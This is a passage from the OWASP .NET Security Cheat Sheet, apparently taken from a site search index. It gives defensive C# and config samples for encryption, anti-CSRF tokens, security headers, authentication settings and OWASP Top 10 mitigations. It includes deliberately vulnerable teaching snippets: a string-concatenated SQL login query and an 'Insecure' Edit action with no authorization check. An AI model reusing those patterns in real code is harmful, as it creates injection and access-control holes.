A few constraints/pitfalls with this code:

Click here to view the \"AES-GCM symmetric encryption\" code snippet.
// Code based on example from here:\n// https://www.scottbrady91.com/c-sharp/aes-gcm-dotnet\n\npublic class AesGcmSimpleTest\n{\npublic static void Main()\n{\n\n// Key of 32 bytes / 256 bits for AES\nvar key = new byte[32];\nRandomNumberGenerator.Fill(key);\n\n// MaxSize = 12 bytes / 96 bits and this size should always be used.\nvar nonce = new byte[AesGcm.NonceByteSizes.MaxSize];\nRandomNumberGenerator.Fill(nonce);\n\n// Tag for authenticated encryption\nvar tag = new byte[AesGcm.TagByteSizes.MaxSize];\n\nvar message = \"This message to be encrypted\";\nConsole.WriteLine(message);\n\n// Encrypt the message\nvar cipherText = AesGcmSimple.Encrypt(message, nonce, out tag, key);\nConsole.WriteLine(Convert.ToBase64String(cipherText));\n\n// Decrypt the message\nvar message2 = AesGcmSimple.Decrypt(cipherText, nonce, tag, key);\nConsole.WriteLine(message2);\n\n\n}\n}\n\n\npublic static class AesGcmSimple\n{\n\npublic static byte[] Encrypt(string plaintext, byte[] nonce, out byte[] tag, byte[] key)\n{\nusing(var aes = new AesGcm(key))\n{\n// Tag for authenticated encryption\ntag = new byte[AesGcm.TagByteSizes.MaxSize];\n\n// Create a byte array from the message to encrypt\nvar plaintextBytes = Encoding.UTF8.GetBytes(plaintext);\n\n// Ciphertext will be same length in bytes as plaintext \nvar ciphertext = new byte[plaintextBytes.Length];\n\n// perform the actual encryption\naes.Encrypt(nonce, plaintextBytes, ciphertext, tag);\nreturn ciphertext;\n}\n}\n\npublic static string Decrypt(byte[] ciphertext, byte[] nonce, byte[] tag, byte[] key)\n{\nusing(var aes = new AesGcm(key))\n{\n// Plaintext will be same length in bytes as Ciphertext \nvar plaintextBytes = new byte[ciphertext.Length];\n\n// perform the actual decryption\naes.Decrypt(nonce, ciphertext, tag, plaintextBytes);\n\nreturn Encoding.UTF8.GetString(plaintextBytes);\n}\n}\n}\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#encryption-for-transmission","title":"Encryption for transmission","text":"

The following code snippet shows an example of using Elliptic Curve Diffie-Hellman (ECDH) together with AES-GCM to perform encryption/decryption of data between two different sides without the need to transfer the symmetric key between them. Instead, the sides exchange public keys and can then use ECDH to generate a shared secret which can be used for the symmetric encryption.

Again, it is strongly recommended to have a cryptography expert review your final design and code, as even the most trivial error can severely weaken your encryption.

Note that this code sample relies on the AesGcmSimple class from the previous section.

A few constraints/pitfalls with this code:

Click here to view the \"ECDH asymmetric encryption\" code snippet.
public class ECDHSimpleTest\n{\npublic static void Main()\n{\n// Generate ECC key pair for Alice\nvar alice = new ECDHSimple();\nbyte[] alicePublicKey = alice.PublicKey;\n\n// Generate ECC key pair for Bob\nvar bob = new ECDHSimple();\nbyte[] bobPublicKey = bob.PublicKey;\n\nstring plaintext = \"Hello, Bob! How are you?\";\nConsole.WriteLine(\"Secret being sent from Alice to Bob: \" + plaintext);\n\n// Note that a new nonce is generated with every encryption operation in line with\n// in line with the AES GCM security \nbyte[] tag;\nbyte[] nonce;\nvar cipherText = alice.Encrypt(bobPublicKey, plaintext, out nonce, out tag);\nConsole.WriteLine(\"Ciphertext, nonce, and tag being sent from Alice to Bob: \" + Convert.ToBase64String(cipherText) + \" \" + Convert.ToBase64String(nonce) + \" \" + Convert.ToBase64String(tag));\n\nvar decrypted = bob.Decrypt(alicePublicKey, cipherText, nonce, tag);\nConsole.WriteLine(\"Secret received by Bob from Alice: \" + decrypted);\n\nConsole.WriteLine();\n\nstring plaintext2 = \"Hello, Alice! I'm good, how are you?\";\nConsole.WriteLine(\"Secret being sent from Bob to Alice: \" + plaintext2);\n\nbyte[] tag2;\nbyte[] nonce2;\nvar cipherText2 = bob.Encrypt(alicePublicKey, plaintext2, out nonce2, out tag2);\nConsole.WriteLine(\"Ciphertext, nonce, and tag being sent from Bob to Alice: \" + Convert.ToBase64String(cipherText2) + \" \" + Convert.ToBase64String(nonce2) + \" \" + Convert.ToBase64String(tag2));\n\nvar decrypted2 = alice.Decrypt(bobPublicKey, cipherText2, nonce2, tag2);\nConsole.WriteLine(\"Secret received by Alice from Bob: \" + decrypted2);\n}\n}\n\n\npublic class ECDHSimple\n{\n\nprivate ECDiffieHellmanCng ecdh = new ECDiffieHellmanCng();\n\npublic byte[] PublicKey\n{\nget\n{\nreturn ecdh.PublicKey.ToByteArray();\n}\n}\n\npublic byte[] Encrypt(byte[] partnerPublicKey, string message, out byte[] nonce, out byte[] tag)\n{\n// Generate the AES Key and Nonce\nvar aesKey = GenerateAESKey(partnerPublicKey);\n\n// Tag for authenticated encryption\ntag = new byte[AesGcm.TagByteSizes.MaxSize];\n\n// MaxSize = 12 bytes / 96 bits and this size should always be used.\n// A new nonce is generated with every encryption operation in line with\n// the AES GCM security model\nnonce = new byte[AesGcm.NonceByteSizes.MaxSize];\nRandomNumberGenerator.Fill(nonce);\n\n// return the encrypted value\nreturn AesGcmSimple.Encrypt(message, nonce, out tag, aesKey);\n}\n\n\npublic string Decrypt(byte[] partnerPublicKey, byte[] ciphertext, byte[] nonce, byte[] tag)\n{\n// Generate the AES Key and Nonce\nvar aesKey = GenerateAESKey(partnerPublicKey);\n\n// return the decrypted value\nreturn AesGcmSimple.Decrypt(ciphertext, nonce, tag, aesKey);\n}\n\nprivate byte[] GenerateAESKey(byte[] partnerPublicKey)\n{\n// Derive the secret based on this side's private key and the other side's public key \nbyte[] secret = ecdh.DeriveKeyMaterial(CngKey.Import(partnerPublicKey, CngKeyBlobFormat.EccPublicBlob));\n\nbyte[] aesKey = new byte[32]; // 256-bit AES key\nArray.Copy(secret, 0, aesKey, 0, 32); // Copy first 32 bytes as the key\n\nreturn aesKey;\n}\n}\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#hashing","title":"Hashing","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#general","title":"General","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#asp-net-web-forms-guidance","title":"ASP NET Web Forms Guidance","text":"

ASP.NET Web Forms is the original browser-based application development API for the .NET framework, and is still the most common enterprise platform for web application development.

protected\u00a0override\u00a0void\u00a0OnInit(EventArgs\u00a0e)\u00a0{\nbase.OnInit(e);\nViewStateUserKey\u00a0=\u00a0Session.SessionID;\n}\n

If you don't use Viewstate, then look to the default master page of the ASP.NET Web Forms default template for a manual anti-CSRF token using a double-submit cookie.

private\u00a0const\u00a0string\u00a0AntiXsrfTokenKey\u00a0=\u00a0\"__AntiXsrfToken\";\nprivate\u00a0const\u00a0string\u00a0AntiXsrfUserNameKey\u00a0=\u00a0\"__AntiXsrfUserName\";\nprivate\u00a0string\u00a0_antiXsrfTokenValue;\nprotected\u00a0void\u00a0Page_Init(object\u00a0sender,\u00a0EventArgs\u00a0e)\n{\n//\u00a0The\u00a0code\u00a0below\u00a0helps\u00a0to\u00a0protect\u00a0against\u00a0XSRF\u00a0attacks\nvar\u00a0requestCookie\u00a0=\u00a0Request.Cookies[AntiXsrfTokenKey];\nGuid\u00a0requestCookieGuidValue;\nif\u00a0(requestCookie\u00a0!=\u00a0null\u00a0&&\u00a0Guid.TryParse(requestCookie.Value,\u00a0out\u00a0requestCookieGuidValue))\n{\n//\u00a0Use\u00a0the\u00a0Anti-XSRF\u00a0token\u00a0from\u00a0the\u00a0cookie\n_antiXsrfTokenValue\u00a0=\u00a0requestCookie.Value;\nPage.ViewStateUserKey\u00a0=\u00a0_antiXsrfTokenValue;\n}\nelse\n{\n//\u00a0Generate\u00a0a\u00a0new\u00a0Anti-XSRF\u00a0token\u00a0and\u00a0save\u00a0to\u00a0the\u00a0cookie\n_antiXsrfTokenValue\u00a0=\u00a0Guid.NewGuid().ToString(\"N\");\nPage.ViewStateUserKey\u00a0=\u00a0_antiXsrfTokenValue;\nvar\u00a0responseCookie\u00a0=\u00a0new\u00a0HttpCookie(AntiXsrfTokenKey)\n{\nHttpOnly\u00a0=\u00a0true,\nValue\u00a0=\u00a0_antiXsrfTokenValue\n};\nif\u00a0(FormsAuthentication.RequireSSL\u00a0&&\u00a0Request.IsSecureConnection)\n{\nresponseCookie.Secure\u00a0=\u00a0true;\n}\nResponse.Cookies.Set(responseCookie);\n}\nPage.PreLoad\u00a0+=\u00a0master_Page_PreLoad;\n}\nprotected\u00a0void\u00a0master_Page_PreLoad(object\u00a0sender,\u00a0EventArgs\u00a0e)\n{\nif\u00a0(!IsPostBack)\n{\n//\u00a0Set\u00a0Anti-XSRF\u00a0token\nViewState[AntiXsrfTokenKey]\u00a0=\u00a0Page.ViewStateUserKey;\nViewState[AntiXsrfUserNameKey]\u00a0=\u00a0Context.User.Identity.Name\u00a0??\u00a0String.Empty;\n}\nelse\n{\n//\u00a0Validate\u00a0the\u00a0Anti-XSRF\u00a0token\nif ((string)ViewState[AntiXsrfTokenKey] != _antiXsrfTokenValue ||\n(string)ViewState[AntiXsrfUserNameKey]\u00a0!=\u00a0(Context.User.Identity.Name\u00a0??\u00a0String.Empty))\n{\nthrow\u00a0new\u00a0InvalidOperationException(\"Validation\u00a0of\u00a0Anti-XSRF\u00a0token\u00a0failed.\");\n}\n}\n}\n
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<configuration>\n<system.web>\n<httpRuntime enableVersionHeader=\"false\"/>\n</system.web>\n<system.webServer>\n<security>\n<requestFiltering removeServerHeader=\"true\" />\n</security>\n<staticContent>\n<clientCache cacheControlCustom=\"public\"\ncacheControlMode=\"UseMaxAge\"\ncacheControlMaxAge=\"1.00:00:00\"\nsetEtag=\"true\" />\n</staticContent>\n<httpProtocol>\n<customHeaders>\n<add name=\"Content-Security-Policy\"\nvalue=\"default-src 'none'; style-src 'self'; img-src 'self'; font-src 'self'\" />\n<add name=\"X-Content-Type-Options\" value=\"NOSNIFF\" />\n<add name=\"X-Frame-Options\" value=\"DENY\" />\n<add name=\"X-Permitted-Cross-Domain-Policies\" value=\"master-only\"/>\n<add name=\"X-XSS-Protection\" value=\"0\"/>\n<remove name=\"X-Powered-By\"/>\n</customHeaders>\n</httpProtocol>\n<rewrite>\n<rules>\n<rule name=\"Redirect to https\">\n<match url=\"(.*)\"/>\n<conditions>\n<add input=\"{HTTPS}\" pattern=\"Off\"/>\n<add input=\"{REQUEST_METHOD}\" pattern=\"^get$|^head$\" />\n</conditions>\n<action type=\"Redirect\" url=\"https://{HTTP_HOST}/{R:1}\" redirectType=\"Permanent\"/>\n</rule>\n</rules>\n<outboundRules>\n<rule name=\"Add HSTS Header\" enabled=\"true\">\n<match serverVariable=\"RESPONSE_Strict_Transport_Security\" pattern=\".*\" />\n<conditions>\n<add input=\"{HTTPS}\" pattern=\"on\" ignoreCase=\"true\" />\n</conditions>\n<action type=\"Rewrite\" value=\"max-age=15768000\" />\n</rule>\n</outboundRules>\n</rewrite>\n</system.webServer>\n</configuration>\n
<httpRuntime enableVersionHeader=\"false\" />\n
HttpContext.Current.Response.Headers.Remove(\"Server\");\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#http-validation-and-encoding","title":"HTTP validation and encoding","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#forms-authentication","title":"Forms authentication","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#asp-net-mvc-guidance","title":"ASP NET MVC Guidance","text":"

ASP.NET MVC (Model\u2013View\u2013Controller) is a contemporary web application framework that uses more standardized HTTP communication than the Web Forms postback model.

The OWASP Top 10 2017 lists the most prevalent and dangerous threats to web security in the world today and is reviewed every 3 years.

This section is based on that list. Your approach to securing your web application should be to start at the top threat (A1 below) and work down; this ensures that any time spent on security is spent most effectively, covering the top threats first and lesser threats afterwards. After covering the top 10, it is generally advisable to assess for other threats or get a professionally completed penetration test.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a1-injection","title":"A1 Injection","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#sql-injection","title":"SQL Injection","text":"

DO: Use an object relational mapper (ORM) or stored procedures; this is the most effective way of countering the SQL Injection vulnerability.

DO: Use parameterized queries where a direct SQL query must be used. More information can be found here.

e.g. In entity frameworks:

var\u00a0sql\u00a0=\u00a0@\"Update\u00a0[User]\u00a0SET\u00a0FirstName\u00a0=\u00a0@FirstName\u00a0WHERE\u00a0Id\u00a0=\u00a0@Id\";\ncontext.Database.ExecuteSqlCommand(\nsql,\nnew\u00a0SqlParameter(\"@FirstName\",\u00a0firstname),\nnew\u00a0SqlParameter(\"@Id\",\u00a0id));\n

DO NOT: Concatenate strings anywhere in your code and execute them against your database (Known as dynamic sql).

NB: You can still accidentally do this with ORMs or Stored procedures so check everywhere.

e.g

string\u00a0strQry\u00a0=\u00a0\"SELECT\u00a0*\u00a0FROM\u00a0Users\u00a0WHERE\u00a0UserName='\"\u00a0+\u00a0txtUser.Text\u00a0+\u00a0\"'\u00a0AND\u00a0Password='\"\n+\u00a0txtPassword.Text\u00a0+\u00a0\"'\";\nEXEC\u00a0strQry\u00a0//\u00a0SQL\u00a0Injection\u00a0vulnerability!\n

DO: Practice Least Privilege - connect to the database using an account with the minimum set of permissions required to do its job, i.e. not the sa account.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#os-injection","title":"OS Injection","text":"

General guidance about OS Injection can be found on this cheat sheet.

DO: Use System.Diagnostics.Process.Start to call underlying OS functions.

e.g

var process = new System.Diagnostics.Process();\nvar startInfo = new System.Diagnostics.ProcessStartInfo();\nstartInfo.FileName = \"validatedCommand\";\nstartInfo.Arguments = \"validatedArg1 validatedArg2 validatedArg3\";\nprocess.StartInfo = startInfo;\nprocess.Start();\n

DO NOT: Assume that this mechanism will protect against malicious input designed to break out of one argument and then tamper with another argument to the process. This will still be possible.

DO: Use allow-list validation on all user supplied input wherever possible. Input validation prevents improperly formed data from entering an information system. For more information please see the Input Validation Cheat Sheet.

e.g Validating user input using IPAddress.TryParse Method

//User input\nstring ipAddress = \"127.0.0.1\";\n\n//check to make sure an ip address was provided\nif (!string.IsNullOrEmpty(ipAddress))\n{\n// Create an instance of IPAddress for the specified address string (in\n// dotted-quad, or colon-hexadecimal notation).\nif (IPAddress.TryParse(ipAddress, out var address))\n{\n// Display the address in standard notation.\nreturn address.ToString();\n}\nelse\n{\n//ipAddress is not of type IPAddress\n...\n}\n...\n}\n

DO: Try to accept only simple alphanumeric characters.

DO NOT: Assume you can sanitize special characters without actually removing them. Various combinations of \\, ' and @ may have an unexpected impact on sanitization attempts.

DO NOT: Rely on methods without a security guarantee.

e.g. .NET Core 2.2 and greater and .NET 5 and greater support ProcessStartInfo.ArgumentList which performs some character escaping but the object includes a disclaimer that it is not safe with untrusted input.

DO: Look at alternatives to passing raw untrusted arguments via command-line parameters such as encoding using Base64 (which would safely encode any special characters as well) and then decode the parameters in the receiving application.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#ldap-injection","title":"LDAP injection","text":"

Almost any character can be used in Distinguished Names. However, some must be escaped with the backslash \\ escape character. A table showing which characters should be escaped for Active Directory can be found in the LDAP Injection Prevention Cheat Sheet.

NB: The space character must be escaped only if it is the leading or trailing character in a component name, such as a Common Name. Embedded spaces should not be escaped.

More information can be found here.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a2-broken-authentication","title":"A2 Broken Authentication","text":"

DO: Use ASP.NET Core Identity. The ASP.NET Core Identity framework is well configured by default: it uses secure password hashes and an individual salt. Identity uses the PBKDF2 hashing function for passwords and generates a random salt per user.

DO: Set a secure password policy.

e.g. ASP.NET Core Identity:

//startup.cs\nservices.Configure<IdentityOptions>(options =>\n{\n// Password settings\noptions.Password.RequireDigit = true;\noptions.Password.RequiredLength = 8;\noptions.Password.RequireNonAlphanumeric = true;\noptions.Password.RequireUppercase = true;\noptions.Password.RequireLowercase = true;\noptions.Password.RequiredUniqueChars = 6;\n\n\noptions.Lockout.DefaultLockoutTimeSpan = TimeSpan.FromMinutes(30);\noptions.Lockout.MaxFailedAccessAttempts = 3;\n\noptions.SignIn.RequireConfirmedEmail = true;\n\noptions.User.RequireUniqueEmail = true;\n});\n

DO: Set a cookie policy

e.g

//startup.cs\nservices.ConfigureApplicationCookie(options =>\n{\noptions.Cookie.HttpOnly = true;\noptions.Cookie.Expiration = TimeSpan.FromHours(1);\noptions.SlidingExpiration = true;\n});\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a3-sensitive-data-exposure","title":"A3 Sensitive Data Exposure","text":"

DO NOT: Store encrypted passwords.

DO: Use a strong hash to store password credentials. For hash refer to this section.

DO: Enforce passwords with a minimum complexity that will survive a dictionary attack i.e. longer passwords that use the full character set (numbers, symbols and letters) to increase the entropy.

DO: Use a strong encryption routine such as AES-256 where personally identifiable data needs to be restored to its original format. Protect encryption keys more than any other asset; please find more information on storing encryption keys at rest. Apply the following test: would you be happy leaving the data on a spreadsheet on a bus for everyone to read? Assume the attacker can get direct access to your database and protect it accordingly. More information can be found here.

DO: Use TLS 1.2 for your entire site. Get a free certificate from LetsEncrypt.org.

DO NOT: Allow SSL; it is now obsolete.

DO: Have a strong TLS policy (see SSL Best Practices), use TLS 1.2 wherever possible. Then check the configuration using SSL Test or TestSSL.

DO: Ensure headers are not disclosing information about your application. See HttpHeaders.cs , Dionach StripHeaders, disable via web.config or startup.cs:

More information on Transport Layer Protection can be found here. e.g Web.config

<system.web>\n<httpRuntime enableVersionHeader=\"false\"/>\n</system.web>\n<system.webServer>\n<security>\n<requestFiltering removeServerHeader=\"true\" />\n</security>\n<httpProtocol>\n<customHeaders>\n<add name=\"X-Content-Type-Options\" value=\"nosniff\" />\n<add name=\"X-Frame-Options\" value=\"DENY\" />\n<add name=\"X-Permitted-Cross-Domain-Policies\" value=\"master-only\"/>\n<add name=\"X-XSS-Protection\" value=\"0\"/>\n<remove name=\"X-Powered-By\"/>\n</customHeaders>\n</httpProtocol>\n</system.webServer>\n

e.g Startup.cs

app.UseHsts(hsts => hsts.MaxAge(365).IncludeSubdomains());\napp.UseXContentTypeOptions();\napp.UseReferrerPolicy(opts => opts.NoReferrer());\napp.UseXXssProtection(options => options.FilterDisabled());\napp.UseXfo(options => options.Deny());\n\napp.UseCsp(opts => opts\n.BlockAllMixedContent()\n.StyleSources(s => s.Self())\n.StyleSources(s => s.UnsafeInline())\n.FontSources(s => s.Self())\n.FormActions(s => s.Self())\n.FrameAncestors(s => s.Self())\n.ImageSources(s => s.Self())\n.ScriptSources(s => s.Self())\n);\n

More information about headers can be found here.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a4-xml-external-entities-xxe","title":"A4 XML External Entities (XXE)","text":"

XXE attacks occur when an XML parser does not properly process user input that contains an external entity declaration in the doctype of an XML payload.

This article discusses the most common XML Processing Options for .NET.

Please refer to the XXE cheat sheet for more detailed information on preventing XXE and other XML Denial of Service attacks.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a5-broken-access-control","title":"A5 Broken Access Control","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#weak-account-management","title":"Weak Account management","text":"

Ensure cookies are sent via httpOnly:

CookieHttpOnly\u00a0=\u00a0true,\n

Reduce the time period a session can be stolen in by reducing session timeout and removing sliding expiration:

ExpireTimeSpan\u00a0=\u00a0TimeSpan.FromMinutes(60),\nSlidingExpiration\u00a0=\u00a0false\n

See here for full startup code snippet

Ensure cookie is sent over HTTPS in the production environment. This should be enforced in the config transforms:

<httpCookies requireSSL=\"true\" xdt:Transform=\"SetAttributes(requireSSL)\"/>\n<authentication>\n<forms requireSSL=\"true\" xdt:Transform=\"SetAttributes(requireSSL)\"/>\n</authentication>\n

Protect LogOn, Registration and password reset methods against brute force attacks by throttling requests (see code below), consider also using ReCaptcha.

[HttpPost]\n[AllowAnonymous]\n[ValidateAntiForgeryToken]\n[AllowXRequestsEveryXSecondsAttribute(Name = \"LogOn\",\nMessage = \"You have performed this action more than {x} times in the last {n} seconds.\",\nRequests = 3, Seconds = 60)]\npublic\u00a0async\u00a0Task<ActionResult>\u00a0LogOn(LogOnViewModel\u00a0model,\u00a0string\u00a0returnUrl)\n

DO NOT: Roll your own authentication or session management, use the one provided by .Net

DO NOT: Tell someone if the account exists on LogOn, Registration or Password reset. Say something like 'Either the username or password was incorrect', or 'If this account exists then a reset token will be sent to the registered email address'. This protects against account enumeration.

The feedback to the user should be identical whether or not the account exists, both in terms of content and behavior: e.g. if the response takes 50% longer when the account is real then membership information can be guessed and tested.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#missing-function-level-access-control","title":"Missing function-level access control","text":"

DO: Authorize users on all externally facing endpoints. The .NET framework has many ways to authorize a user, use them at method level:

[Authorize(Roles\u00a0=\u00a0\"Admin\")]\n[HttpGet]\npublic\u00a0ActionResult\u00a0Index(int\u00a0page\u00a0=\u00a01)\n

or better yet, at controller level:

[Authorize]\npublic\u00a0class\u00a0UserController\n

You can also check roles in code using identity features in .net: System.Web.Security.Roles.IsUserInRole(userName, roleName)

You can find more information here on Access Control and here for Authorization.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#insecure-direct-object-references","title":"Insecure Direct object references","text":"

When you have a resource (object) which can be accessed by a reference (in the sample below this is the id), you need to ensure that the user is actually permitted to access it.

//\u00a0Insecure\npublic\u00a0ActionResult\u00a0Edit(int\u00a0id)\n{\nvar\u00a0user\u00a0=\u00a0_context.Users.FirstOrDefault(e\u00a0=>\u00a0e.Id\u00a0==\u00a0id);\nreturn\u00a0View(\"Details\",\u00a0new\u00a0UserViewModel(user));\n}\n\n//\u00a0Secure\npublic\u00a0ActionResult\u00a0Edit(int\u00a0id)\n{\nvar\u00a0user\u00a0=\u00a0_context.Users.FirstOrDefault(e\u00a0=>\u00a0e.Id\u00a0==\u00a0id);\n//\u00a0Establish\u00a0user\u00a0has\u00a0right\u00a0to\u00a0edit\u00a0the\u00a0details\nif\u00a0(user.Id\u00a0!=\u00a0_userIdentity.GetUserId())\n{\nHandleErrorInfo\u00a0error\u00a0=\u00a0new\u00a0HandleErrorInfo(\nnew\u00a0Exception(\"INFO:\u00a0You\u00a0do\u00a0not\u00a0have\u00a0permission\u00a0to\u00a0edit\u00a0these\u00a0details\"));\nreturn\u00a0View(\"Error\",\u00a0error);\n}\nreturn\u00a0View(\"Edit\",\u00a0new\u00a0UserViewModel(user));\n}\n

More information can be found here for Insecure Direct Object Reference.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a6-security-misconfiguration","title":"A6 Security Misconfiguration","text":""},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#debug-and-stack-trace","title":"Debug and Stack Trace","text":"

Ensure debug and trace are off in production. This can be enforced using web.config transforms:

<compilation xdt:Transform=\"RemoveAttributes(debug)\" />\n<trace enabled=\"false\" xdt:Transform=\"Replace\"/>\n

DO NOT: Use default passwords

DO: (When using TLS) Redirect a request made over Http to https:

e.g Global.asax.cs

protected\u00a0void\u00a0Application_BeginRequest()\n{\n#if\u00a0!DEBUG\n//\u00a0SECURE:\u00a0Ensure\u00a0any\u00a0request\u00a0is\u00a0returned\u00a0over\u00a0SSL/TLS\u00a0in\u00a0production\nif\u00a0(!Request.IsLocal\u00a0&&\u00a0!Context.Request.IsSecureConnection)\u00a0{\nvar\u00a0redirect\u00a0=\u00a0Context.Request.Url.ToString()\n.ToLower(CultureInfo.CurrentCulture)\n.Replace(\"http:\",\u00a0\"https:\");\nResponse.Redirect(redirect);\n}\n#endif\n}\n

e.g Startup.cs in the Configure()

  app.UseHttpsRedirection();\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#cross-site-request-forgery","title":"Cross-site request forgery","text":"

DO NOT: Send sensitive data without validating Anti-Forgery-Tokens (.NET / .NET Core).

DO: Send the anti-forgery token with every POST/PUT request:

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#using-net-framework","title":"Using .NET Framework","text":"
using (Html.BeginForm(\"LogOff\", \"Account\", FormMethod.Post, new { id = \"logoutForm\",\n@class = \"pull-right\" }))\n{\n@Html.AntiForgeryToken()\n<ul class=\"nav nav-pills\">\n<li role=\"presentation\">\nLogged on as @User.Identity.Name\n</li>\n<li role=\"presentation\">\n<a href=\"javascript:document.getElementById('logoutForm').submit()\">Log off</a>\n</li>\n</ul>\n}\n

Then validate it at the method or preferably the controller level:

[HttpPost]\n[ValidateAntiForgeryToken]\npublic\u00a0ActionResult\u00a0LogOff()\n

Make sure the tokens are removed completely for invalidation on logout.

///\u00a0<summary>\n///\u00a0SECURE:\u00a0Remove\u00a0any\u00a0remaining\u00a0cookies\u00a0including\u00a0Anti-CSRF\u00a0cookie\n///\u00a0</summary>\npublic\u00a0void\u00a0RemoveAntiForgeryCookie(Controller\u00a0controller)\n{\nstring[]\u00a0allCookies\u00a0=\u00a0controller.Request.Cookies.AllKeys;\nforeach\u00a0(string\u00a0cookie\u00a0in\u00a0allCookies)\n{\nif\u00a0(controller.Response.Cookies[cookie]\u00a0!=\u00a0null\u00a0&&\ncookie\u00a0==\u00a0\"__RequestVerificationToken\")\n{\ncontroller.Response.Cookies[cookie].Expires\u00a0=\u00a0DateTime.Now.AddDays(-1);\n}\n}\n}\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#using-net-core-20-or-later","title":"Using .NET Core 2.0 or later","text":"

Starting with .NET Core 2.0 it is possible to automatically generate and verify the antiforgery token.

If you are using tag-helpers, which is the default for most web project templates, then all forms will automatically send the anti-forgery token. You can check if tag-helpers are enabled by checking if your main _ViewImports.cshtml file contains:

@addTagHelper *, Microsoft.AspNetCore.Mvc.TagHelpers\n

IHtmlHelper.BeginForm also sends anti-forgery-tokens automatically.

Unless you are using tag-helpers or IHtmlHelper.BeginForm, you must use the requisite helper on forms as seen here:

<form action=\"RelevantAction\" >\n@Html.AntiForgeryToken()\n</form>\n

To automatically validate all requests other than GET, HEAD, OPTIONS and TRACE you need to add a global action filter with the AutoValidateAntiforgeryToken attribute inside your Startup.cs as mentioned in the following article:

services.AddMvc(options =>\n{\noptions.Filters.Add(new AutoValidateAntiforgeryTokenAttribute());\n});\n

If you need to disable the attribute validation for a specific method on a controller you can add the IgnoreAntiforgeryToken attribute to the controller method (for MVC controllers) or parent class (for Razor pages):

[IgnoreAntiforgeryToken]\n[HttpDelete]\npublic IActionResult Delete()\n
[IgnoreAntiforgeryToken]\npublic class UnsafeModel : PageModel\n

If you need to also validate the token on GET, HEAD, OPTIONS or TRACE - requests you can add the ValidateAntiforgeryToken attribute to the controller method (for MVC controllers) or parent class (for Razor pages):

[HttpGet]\n[ValidateAntiforgeryToken]\npublic IActionResult DoSomethingDangerous()\n
[HttpGet]\n[ValidateAntiforgeryToken]\npublic class SafeModel : PageModel\n

In case you can't use a global action filter, add the AutoValidateAntiforgeryToken attribute to your controller classes or razor page models:

[AutoValidateAntiforgeryToken]\npublic class UserController\n
[AutoValidateAntiforgeryToken]\npublic class SafeModel : PageModel\n
"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#using-net-core-20-or-net-framework-with-ajax","title":"Using .Net Core 2.0 or .NET Framework with AJAX","text":"

You will need to attach the anti-forgery token to AJAX requests.

If you are using jQuery in an ASP.NET Core MVC view this can be achieved using this snippet:

@inject  Microsoft.AspNetCore.Antiforgery.IAntiforgery antiforgeryProvider\n$.ajax(\n{\ntype: \"POST\",\nurl: '@Url.Action(\"Action\", \"Controller\")',\ncontentType: \"application/x-www-form-urlencoded; charset=utf-8\",\ndata: {\nid: id,\n'__RequestVerificationToken': '@antiforgeryProvider.GetAndStoreTokens(this.Context).RequestToken'\n}\n})\n

If you are using the .NET Framework, you can find some code snippets here.

More information can be found here for Cross-Site Request Forgery.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a7-cross-site-scripting-xss","title":"A7 Cross-Site Scripting (XSS)","text":"

DO NOT: Trust any data the user sends you; prefer allow lists (always safe) over block lists.

You get encoding of all HTML content with MVC3. To properly encode all content, whether HTML, JavaScript, CSS, LDAP, etc., use the Microsoft AntiXSS library:

Install-Package\u00a0AntiXSS

Then set in config:

<system.web>\n<httpRuntime targetFramework=\"4.5\"\nenableVersionHeader=\"false\"\nencoderType=\"Microsoft.Security.Application.AntiXssEncoder, AntiXssLibrary\"\nmaxRequestLength=\"4096\" />\n

DO NOT: Use the [AllowHtml] attribute or the helper class @Html.Raw unless you really know that the content you are writing to the browser is safe and has been escaped properly.

DO: Enable a Content Security Policy, this will prevent your pages from accessing assets it should not be able to access (e.g. a malicious script):

<system.webServer>\n<httpProtocol>\n<customHeaders>\n<add name=\"Content-Security-Policy\"\nvalue=\"default-src 'none'; style-src 'self'; img-src 'self';\n                font-src 'self'; script-src 'self'\" />\n

More information can be found here for Cross-Site Scripting.

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a8-insecure-deserialization","title":"A8 Insecure Deserialization","text":"

Information about Insecure Deserialization can be found on this cheat sheet.

DO NOT: Accept Serialized Objects from Untrusted Sources

DO: Validate user input. Malicious users are able to use objects like cookies to insert malicious information to change user roles. In some cases, hackers are able to elevate their privileges to administrator rights by using a pre-existing or cached password hash from a previous session.

DO: Prevent Deserialization of Domain Objects

DO: Run the deserialization code with limited access permissions. If a deserialized hostile object tries to initiate system processes or access a resource within the server or the host's OS, it will be denied access and a permission flag will be raised so that a system administrator is made aware of any anomalous activity on the server.

More information can be found here: Deserialization Cheat Sheet

"},{"location":"cheatsheets/DotNet_Security_Cheat_Sheet.html#a9-using-components-with-known-vulnerabilities","title":"A9 Using Components with Known Vulnerabilities","text":"

DO: Keep the .Net framework updated with the latest patches

DO: Keep your NuGet packages up to date, many will contain their own vulnerabilities.

